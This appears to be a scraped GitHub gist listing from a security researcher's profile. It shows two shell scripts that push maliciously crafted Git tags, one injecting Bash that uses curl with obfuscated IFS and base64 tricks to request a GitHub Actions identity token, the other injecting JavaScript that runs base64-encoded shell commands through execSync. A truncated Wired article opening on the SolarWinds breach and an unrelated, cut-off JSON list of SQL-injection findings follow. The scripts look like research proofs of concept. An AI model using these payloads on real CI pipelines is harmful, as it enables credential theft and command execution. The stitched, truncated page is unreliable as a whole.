Skip to content

Instantly share code, notes, and snippets.

View fproulx-boostsecurity's full-sized avatar
🦊
rocking

François Proulx fproulx-boostsecurity

🦊
rocking
View GitHub Profile
@fproulx-boostsecurity
fproulx-boostsecurity / malicious-bash-in-git-tag.sh
Last active July 4, 2024 20:59
Maliciously crafted Git tag (Bash injection)
#!/bin/bash
#set -x
git commit --allow-empty -m 'New release'
RND_SEMVER="v1.3.$((RANDOM % 1000))"
git tag $RND_SEMVER'$('\
'S="$(echo${IFS}-n${IFS}IA==|base64${IFS}--decode)";'\
'C="$(echo${IFS}-n${IFS}Og==|base64${IFS}--decode)";'\
'curl${IFS}'\
'-H"Authorization${C}${S}bearer${S}$ACTIONS_ID_TOKEN_REQUEST_TOKEN"${IFS}'\
'"$ACTIONS_ID_TOKEN_REQUEST_URL"'\
@fproulx-boostsecurity
fproulx-boostsecurity / malicious-js-in-git-tag.sh
Last active March 15, 2024 19:22
Maliciously crafted Git tag (Javascript injection)
#!/bin/bash
#set -x
git commit --allow-empty -m 'New release'
RND_SEMVER="v1.2.$((RANDOM % 1000))"
S2='env; aws --version'
ENC_S2=$(echo -n "$S2" | base64)
S1="'+require('child_process').execSync(atob('$ENC_S2')).toString()+'"
git tag "${RND_SEMVER}${S1}"
FINAL_TAG=$(git describe --tags --exact-match)
git push origin "$FINAL_TAG"
@fproulx-boostsecurity
fproulx-boostsecurity / wired-solarwinds.md
Created August 1, 2023 19:32
Wired - The Untold Story of the Boldest Supply-Chain Hack Ever

The Untold Story of the Boldest Supply-Chain Hack Ever

The attackers were in thousands of corporate and government networks. They might still be there now. Behind the scenes of the SolarWinds investigation.

By Kim ZetterMay 2, 2023 6:00 AM

Steven Adair wasn’t too rattled at first.

It was late 2019, and Adair, the president of the security firm Volexity, was investigating a digital security breach at an American think tank. The intrusion was nothing special. Adair figured he and his team would rout the attackers quickly and be done with the case—until they noticed something strange. A second group of hackers was active in the think tank’s network. They were going after email, making copies and sending them to an outside server. These intruders were much more skilled, and they were returning to the network several times a week to siphon correspondence from specific executives, policy wonks, and IT staff.

Adair and his colleagues dubbed the second gang of thieves “Dark Halo” and booted them from the netw

{
"data": [{
"injection": {
"findings": [{
"location": "github.com/myorg/a/aaa.py",
"startLineNumber": "1",
"endLineNumber": "2",
"type": "sql-injection"
},